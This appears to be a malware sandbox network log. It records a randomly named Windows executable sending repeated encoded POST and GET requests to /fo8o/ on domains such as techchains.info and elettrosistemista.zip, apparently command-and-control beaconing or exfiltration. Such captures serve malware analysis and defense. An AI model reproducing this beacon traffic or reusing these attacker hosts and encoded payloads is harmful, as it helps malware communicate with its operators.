                                                                                    Jan 8, 2025 15:01:35.281266928 CET1236INData Raw: 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69
                                                                                    Data Ascii: n youre looking for. From general topics to more of what you would expect to find here, rssnewscast.com has it all. We hope you find what you are searchiAECng for!"><link rel="icon" type="image/png" href="//img.s
                                                                                    Jan 8, 2025 15:01:35.281281948 CET1236INData Raw: 65 2d 68 65 69 67 68 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 7d 73 75 62 7b 62 6f 74 74 6f 6d 3a 2d 30 2e 32 35 65 6d 7d 73 75 70 7b 74 6f 70 3a 2d 30
                                                                                    Data Ascii: e-height:0;position:relative;vertical-align:baseline}sub{bottom:-0.25em}sup{top:-0.5em}audio,video{display:inline-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,sele
                                                                                    Jan 8, 2025 15:01:35.281388998 CET1236INData Raw: 5d 3a 3a 2d 77 65 62 6b 69 74 2d 73 65 61 72 63 68 2d 64 65 63 6f 72 61 74 69 6f 6e 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 7d 3a 3a 2d 77 65 62 6b 69 74 2d 66 69 6c 65 2d 75 70 6c 6f 61 64 2d 62 75 74 74 6f 6e 7b
                                                                                    Data Ascii: ]::-webkit-search-decoration{-webkit-appearance:none}::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}details,menu{display:block}summary{display:list-item}canvas{display:inline-block}template{display:none}[hidden]{display:no
                                                                                    Jan 8, 2025 15:01:35.281404972 CET1236INData Raw: 3a 39 30 25 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 38 32 30 70 78 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 7b 70 61 64 64 69 6e 67 3a 30 20 30 20 31 2e 36 65 6d 20 30 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c
                                                                                    Data Ascii: :90%;min-height:820px}.two-tier-ads-list{padding:0 0 1.6em 0}.two-tier-ads-list__list-element{list-style:none;padding:10px 0 5px 0;display:inline-block}.two-tier-ads-list__list-element-image{content:url("//img.sedoparking.com/templates/images/
                                                                                    Jan 8, 2025 15:01:35.281416893 CET1236INData Raw: 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 76 69 73 69 74 65
                                                                                    Data Ascii: barchive-block__list-element-link:link,.webarchive-block__list-element-link:visited{text-decoration:none}.webarchive-block__list-element-link:hover,.webarchive-block__list-element-link:active,.webarchive-block__list-element-link:focus{text-dec
                                                                                    Jan 8, 2025 15:01:35.281435013 CET1236INData Raw: 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d
                                                                                    Data Ascii: tainer-imprint{text-align:center}.container-imprint__content{display:inline-block}.container-imprint__content-text,.container-imprint__content-link{font-size:10px;color:#555}.container-contact-us{text-align:center}.container-contact-us__conten
                                                                                    Jan 8, 2025 15:01:35.281539917 CET1236INData Raw: 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 7b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 32 30 30 2c 32 30 30 2c 32 30 30 2c 2e 37 35 29 3b 74 6f 70 3a 30 3b
                                                                                    Data Ascii: }.cookie-modal-window{position:fixed;background-color:rgba(200,200,200,.75);top:0;right:0;bottom:0;left:0;-webkit-transition:all .3s;-moz-transition:all .3s;transition:all .3s;text-align:center}.cookie-modal-window__content-header{font-size:15
                                                                                    Jan 8, 2025 15:01:35.281714916 CET1236INData Raw: 72 2d 63 6f 6c 6f 72 3a 23 31 61 36 62 32 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 69 74 69 61 6c 7d 2e 62 74 6e 2d 2d 73 65 63 6f 6e 64 61 72 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 38 63 39
                                                                                    Data Ascii: r-color:#1a6b2c;color:#fff;font-size:initial}.btn--secondary{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:medium}.btn--secondary:hover{background-color:#727c83;border-color:#727c83;color:#fff;font-size:medium}.btn--second
                                                                                    Jan 8, 2025 15:01:35.281728029 CET1236INData Raw: 20 47 72 61 6e 64 65 22 2c 73 61 6e 73 2d 73 65 72 69 66 7d 62 6f 64 79 2e 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 2d 65 6e 61 62 6c 65 64 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 33 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 66 6f
                                                                                    Data Ascii: Grande",sans-serif}body.cookie-message-enabled{padding-bottom:300px}.container-footer{padding-top:0;padding-left:5%;padding-right:5%;padding-bottom:10px} </style><script type="text/javascript"> var dto = {"uiOptimize":false,"sing
                                                                                    Jan 8, 2025 15:01:35.286946058 CET1236INData Raw: 22 2c 22 70 75 73 22 3a 22 73 65 73 3d 59 33 4a 6c 50 54 45 33 4d 7a 59 7a 4e 44 51 34 4f 54 55 6d 64 47 4e 70 5a 44 31 33 64 33 63 75 63 6e 4e 7a 62 6d 56 33 63 32 4e 68 63 33 51 75 59 32 39 74 4e 6a 63 33 5a 54 67 31 4d 32 59 79 4f 57 4a 6c 4d
                                                                                    Data Ascii: ","pus":"ses=Y3JlPTE3MzYzNDQ4OTUmdGNpZD13d3cucnNzbmV3c2Nhc3QuY29tNjc3ZTg1M2YyOWJlMzYuMzMxODA2MjQmdGFzaz1zZWFyY2gmZG9tYWluPXJzc25ld3NjYXN0LmNvbSZhX2lkPTMmc2Vzc2lvbj1hMTdsYVdadnJsdUI2YU5MSl9zaQ==","postActionParameter":{"feedback":"/search/fb.ph


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    13192.168.2.54998966.29.149.46803200C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 8, 2025 15:01:48.669852018 CET783OUTPOST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.techchains.info
                                                                                    Origin: http://www.techchains.info
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 206
                                                                                    Referer: http://www.techchains.info/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 55 62 68 64 6d 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 69 4b 34 53 32 61 69 74 78 50 39 4f 6d 54 4b 35 74 56 57 73 56 31 47 52 6c 4a 39 49 61 6d 38 33 56 6a 67 62 4a 4d 45 61 58 49 75 67 57 4b 44 6e 31 5a 75 6e 47 7a 61 38 30 79 2f 6d 47 74 35 53 62 46 57 72 42 75 6f 42 61 4c 6b 37 39 6e 58 66 51 47 46 56 58 56 61 4f 4b 35 6a 51 69 4e 69 69 48 67 48 6e 6e 74 59 34 54 70 69 69 50 6d 36 33 54 41 68 66 59 65 31 7a 4a 74 6f 54 74 50 45 67 4d 38 61 71 62 56 6d 58 58 35 42 66 54 31 51 77 35 7a 65 58 49 64 72 2b 59 53 49 49 64 68 49 53 61 68 49 73 7a 47 4e 63 69 31 4e 6f 76 79 34 6b 6d 62 53 73 59 6e 36 30 39 74 77 3d
                                                                                    Data Ascii: Ubhdm=ic393dm3l8hWiK4S2aitxP9OmTK5tVWsV1GRlJ9Iam83VjgbJMEaXIugWKDn1ZunGza80y/mGt5SbFWrBuoBaLk79nXfQGFVXVaOK5jQiNiiHgHnntY4TpiiPm63TAhfYe1zJtoTtPEgM8aqbVmXX5BfT1Qw5zeXIdr+YSIIdhISahIszGNci1Novy4kmbSsYn609tw=
                                                                                    Jan 8, 2025 15:01:49.268565893 CET637INHTTP/1.1 404 Not Found
                                                                                    Date: Wed, 08 Jan 2025 14:01:49 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 493
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    14192.168.2.54999066.29.149.46803200C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 8, 2025 15:01:51.207081079 CET803OUTPOST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.techchains.info
                                                                                    Origin: http://www.techchains.info
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 226
                                                                                    Referer: http://www.techchains.info/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 55 62 68 64 6d 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 49 33 56 43 77 62 4b 4e 45 61 55 49 75 67 59 71 44 6d 37 35 75 34 47 7a 57 4f 30 77 37 6d 47 70 52 53 62 41 79 72 43 5a 38 47 41 37 6b 39 37 6e 58 42 65 6d 46 56 58 56 61 4f 4b 35 47 48 69 4a 4f 69 48 77 58 6e 6d 4a 45 2f 65 4a 69 68 5a 32 36 33 58 41 67 55 59 65 31 46 4a 73 30 39 74 4e 4d 67 4d 38 71 71 62 42 36 51 64 35 42 5a 63 56 52 67 35 78 6a 64 50 72 6e 38 53 53 35 50 4e 67 6f 57 53 33 6c 47 70 6b 46 30 78 56 68 51 2f 68 77 54 33 72 7a 46 43 45 71 45 6a 36 6c 52 4e 63 71 31 55 39 69 56 32 62 32 58 2f 52 73 2b 46 6d 46 4e
                                                                                    Data Ascii: Ubhdm=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVI3VCwbKNEaUIugYqDm75u4GzWO0w7mGpRSbAyrCZ8GA7k97nXBemFVXVaOK5GHiJOiHwXnmJE/eJihZ263XAgUYe1FJs09tNMgM8qqbB6Qd5BZcVRg5xjdPrn8SS5PNgoWS3lGpkF0xVhQ/hwT3rzFCEqEj6lRNcq1U9iV2b2X/Rs+FmFN
                                                                                    Jan 8, 2025 15:01:51.824213982 CET637INHTTP/1.1 404 Not Found
                                                                                    Date: Wed, 08 Jan 2025 14:01:51 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 493
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    15192.168.2.54999166.29.149.46803200C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 8, 2025 15:01:53.737837076 CET1820OUTPOST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.techchains.info
                                                                                    Origin: http://www.techchains.info
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 1242
                                                                                    Referer: http://www.techchains.info/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 55 62 68 64 6d 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 51 33 56 31 77 62 4b 75 38 61 56 49 75 67 51 4b 44 6a 37 35 76 69 47 7a 2b 4b 30 77 6e 32 47 76 56 53 42 6d 2b 72 4b 4e 51 47 4f 4c 6b 39 35 6e 58 63 51 47 46 45 58 56 71 4b 4b 35 32 48 69 4a 4f 69 48 31 54 6e 68 64 59 2f 63 4a 69 69 50 6d 36 7a 54 41 68 7a 59 65 73 77 4a 73 41 44 75 39 73 67 4d 59 4f 71 65 79 53 51 41 4a 42 62 5a 56 51 6c 35 78 76 65 50 74 44 57 53 53 39 70 4e 6e 63 57 44 32 67 46 78 31 5a 31 7a 56 4d 79 39 68 4d 2f 32 39 50 59 42 6b 57 65 67 36 34 30 57 38 32 68 53 35 62 52 2b 37 33 2f 70 31 59 78 46 53 30 52 52 4a 71 57 32 41 7a 76 70 6a 47 62 49 38 31 4c 70 36 56 6b 71 62 39 50 7a 33 70 72 75 61 75 50 52 51 6d 44 34 44 49 71 68 2b 41 4e 67 61 38 6b 31 58 38 6b 79 50 74 4d 6d 67 59 70 30 4f 63 45 34 33 4a 57 57 37 4e 71 4c 65 49 6f 76 41 4a 52 66 63 6e 2f 44 2b 4a 63 52 51 61 42 5a 72 68 6b 73 75 44 75 5a 71 6c 45 73 48 4a 2f 58 37 38 67 [TRUNCATED]
                                                                                    Data Ascii: Ubhdm=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVQ3V1wbKu8aVIugQKDj75viGz+K0wn2GvVSBm+rKNQGOLk95nXcQGFEXVqKK52HiJOiH1TnhdY/cJiiPm6zTAhzYeswJsADu9sgMYOqeySQAJBbZVQl5xvePtDWSS9pNncWD2gFx1Z1zVMy9hM/29PYBkWeg640W82hS5bR+73/p1YxFS0RRJqW2AzvpjGbI81Lp6Vkqb9Pz3pruauPRQmD4DIqh+ANga8k1X8kyPtMmgYp0OcE43JWW7NqLeIovAJRfcn/D+JcRQaBZrhksuDuZqlEsHJ/X78gWoLuPOUIMSi8BLb47JHp5nQZNcZXj6xRy4dk7daE4QycCvUUzUe6EDlGixQLo2JyxdCCjB99BrvpqTvXwoZrEGGveh1YUvD1M9uwhS2Djxkp2e8N11pcLjj3V7fQpSR0PSbup4sS5SNgcqy1OyN6NQpjD2Gsu3STmTn34rqvP3gyE99T1zbRN89ecSSpiwgrnQGzxJxojkTHtDvbDPc2mGlo/980AbVDdw2V4nCfsT9slapAKaq7EEGSeL5i5bH26IQFj/h5ste+eT38btOkmrSX2Uhvlx7+D+TUFcb0rOFOgx6pWk/tKyNXB3rpiYyOR3CiXEqvkhsCKuR2XyVnr3LLe3yV8xHwOTAsZlk9Nr/Hv2Em+zLzYgGBbMENFa0u3f1ylUJeHH8+xGvGM590iI5Uth1I3mxhoJAWDEtppY9LEAiRV+61TFKzUpnM/NRdGOhW5gQEEIRQerBC2R6JTJSEhRMdJ2qTrSzwMCv6VK/n9JXBnu0IG5JtM4G4aYE6Gxt6X1aPY/iCWvNrPXZ4pqgS5iXxHEzdRdodsc9HffbWjYC+3vYu6i5JjkxnT4vfwdN4eDxFbB6sazM4ctju758/LnwlpcqPUKQL9J0uN1KUOJXUXxOtQEXmVLwJAtDjqkYSHfXcx//o/Hx0FG1qN10o4BtUTVzxSF [TRUNCATED]
                                                                                    Jan 8, 2025 15:01:54.347150087 CET637INHTTP/1.1 404 Not Found
                                                                                    Date: Wed, 08 Jan 2025 14:01:54 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 493
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    16192.168.2.54999266.29.149.46803200C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 8, 2025 15:01:56.270982981 CET516OUTGET /fo8o/?Ubhdm=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hboQSxRfFXXJhWlOcLO2B4JSrf1qenLAzZaPHfWrFdh0bEA==&Dvh=YnI07v HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.techchains.info
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Jan 8, 2025 15:01:56.879038095 CET652INHTTP/1.1 404 Not Found
                                                                                    Date: Wed, 08 Jan 2025 14:01:56 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 493
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    17192.168.2.549993195.110.124.133803200C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 8, 2025 15:02:02.103715897 CET801OUTPOST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.elettrosistemista.zip
                                                                                    Origin: http://www.elettrosistemista.zip
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 206
                                                                                    Referer: http://www.elettrosistemista.zip/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 55 62 68 64 6d 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 76 6d 32 51 6e 6b 66 65 70 77 6d 59 51 51 49 75 59 79 6b 47 36 6a 78 58 2b 63 76 52 43 5a 32 50 63 46 4a 72 4d 72 41 4a 43 36 75 58 59 6d 75 39 6a 64 4a 31 34 34 7a 75 7a 2b 41 61 39 38 54 48 42 42 78 47 46 63 4d 7a 4d 33 46 68 63 34 4f 49 2f 6d 37 30 69 66 45 7a 4e 2f 72 72 59 5a 64 79 47 51 6a 37 6c 47 44 77 73 44 61 67 72 6a 66 47 46 6a 45 39 50 77 4b 76 6c 41 2b 6f 36 55 41 6f 66 70 2b 54 36 47 38 6d 32 73 42 73 43 45 72 73 52 67 4e 43 69 53 30 5a 7a 49 56 54 58 76 4b 5a 37 6d 56 63 63 63 59 53 44 52 4c 2b 39 4a 4d 44 5a 2f 48 79 67 4b 62 4b 62 65 45 3d
